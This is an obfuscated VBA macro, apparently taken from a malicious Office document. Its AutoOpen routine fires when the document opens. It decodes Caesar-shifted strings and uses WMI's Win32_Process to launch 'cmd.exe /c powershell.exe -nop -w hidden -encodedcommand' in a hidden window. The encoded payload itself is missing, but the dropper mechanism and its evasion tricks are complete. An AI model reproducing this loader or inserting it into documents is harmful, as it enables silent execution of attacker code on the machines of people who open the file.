




Sub AutoOpen()
	Dim cVAMSkmPfkNzMYwKhe As String
	Dim DjvjOgBdZVCHtaq As Object
	Dim rURhkR As Integer
	Dim woTskFKMQYN As String
	Dim CqavYXJYD as String
	
	rURhkR = 2336
	CqavYXJYD = CGsCUoOEucRpqGjsRK("wSdRekE")
	Set DjvjOgBdZVCHtaq = GetObject(CqavYXJYD)
	woTskFKMQYN = QabMBIveugrczisbDRKruQNp("wSdRekE")
	woTskFKMQYN = VUsJEMVBFPDVL(DjvjOgBdZVCHtaq, woTskFKMQYN, rURhkR)
End Sub

Function QabMBIveugrczisbDRKruQNp(fKnfxUgE As String) As String
	Dim wGDAuhIlGqyiYurgfAH As String
	Dim fPxehPgVpZiWKQ As String
	Dim pYkxZoeBAENQLBGy As String
	pYkxZoeBAENQLBGy = "fpg1h{h#2f#srzhuvkhoo1h{h#0qrs#0z#klgghq#0hqfrghgfrppdqg"

	wGDAuhIlGqyiYurgfAH = pYkxZoeBAENQLBGy
	wGDAuhIlGqyiYurgfAH = yvQetXgrLkZQwunDwSWsVWU(wGDAuhIlGqyiYurgfAH)
	QabMBIveugrczisbDRKruQNp = wGDAuhIlGqyiYurgfAH
End Function

Function QmrVuV() As String
	Dim LfylMRAwQuIANOHNo As String
	LfylMRAwQuIANOHNo = yvQetXgrLkZQwunDwSWsVWU("zlqpjpwv=urrw2flpy5")
	QmrVuV = LfylMRAwQuIANOHNo
End Function

Function VUsJEMVBFPDVL(NQPCAmSEBdzLMRACNbF As Object, yWeCbbYXpuiF As String, fQztWHOFSfRaR As Integer) As String
	Dim EBaviWmSZL As String
	Dim aXiHUYff As Integer
	Dim JYgJlETVvdefJQKovTziaAuU As Integer
	Dim LezKsCiEYwQPbgw As Integer
	aXiHUYff = 1
	EBaviWmSZL = yWeCbbYXpuiF
    If (fQztWHOFSfRaR > aXiHUYff) Then
		Set WTUxQpNxmZkQnROFSUeLaEl = GetObject(QmrVuV())
		Set yvyYsIGOaCpo = WTUxQpNxmZkQnROFSUeLaEl.Get(yvQetXgrLkZQwunDwSWsVWU("Zlq65bSurfhvvVwduwxs"))
		Set bQMeJTxn = yvyYsIGOaCpo.SpawnInstance_
		aXiHUYff = fQztWHOFSfRaR - fQztWHOFSfRaR
		aXiHUYff = aXiHUYff + 12
		bQMeJTxn.ShowWindow = aXiHUYff
		LezKsCiEYwQPbgw = NQPCAmSEBdzLMRACNbF.Create(EBaviWmSZL, null, bQMeJTxn, JYgJlETVvdefJQKovTziaAuU)
	End If
	EBaviWmSZL = "MWaYcC"
	VUsJEMVBFPDVL = EBaviWmSZL
End Function

Function CGsCUoOEucRpqGjsRK(qLItzMyj As String) As String
	Dim bEtpfIkgUqwnURG As String
	bEtpfIkgUqwnURG = yvQetXgrLkZQwunDwSWsVWU("zlqpjpwv=Zlq65bSurfhvv")
	CGsCUoOEucRpqGjsRK = bEtpfIkgUqwnURG
End Function


Function yvQetXgrLkZQwunDwSWsVWU(YMvrtQftcyebXZYb As String) As String
	Dim bZoHKYoOyf As Long
	Dim pulvhhQkdbHbGdXUdKTnx As String
	Dim YKvFKuSsDiWaOKJNg As Integer
	YKvFKuSsDiWaOKJNg = 3
	For bZoHKYoOyf = 1 To Len(YMvrtQftcyebXZYb)
		pulvhhQkdbHbGdXUdKTnx = pulvhhQkdbHbGdXUdKTnx & Chr(Asc(Mid(YMvrtQftcyebXZYb, bZoHKYoOyf, 1)) - YKvFKuSsDiWaOKJNg)
	Next bZoHKYoOyf
	yvQetXgrLkZQwunDwSWsVWU = pulvhhQkdbHbGdXUdKTnx
End Function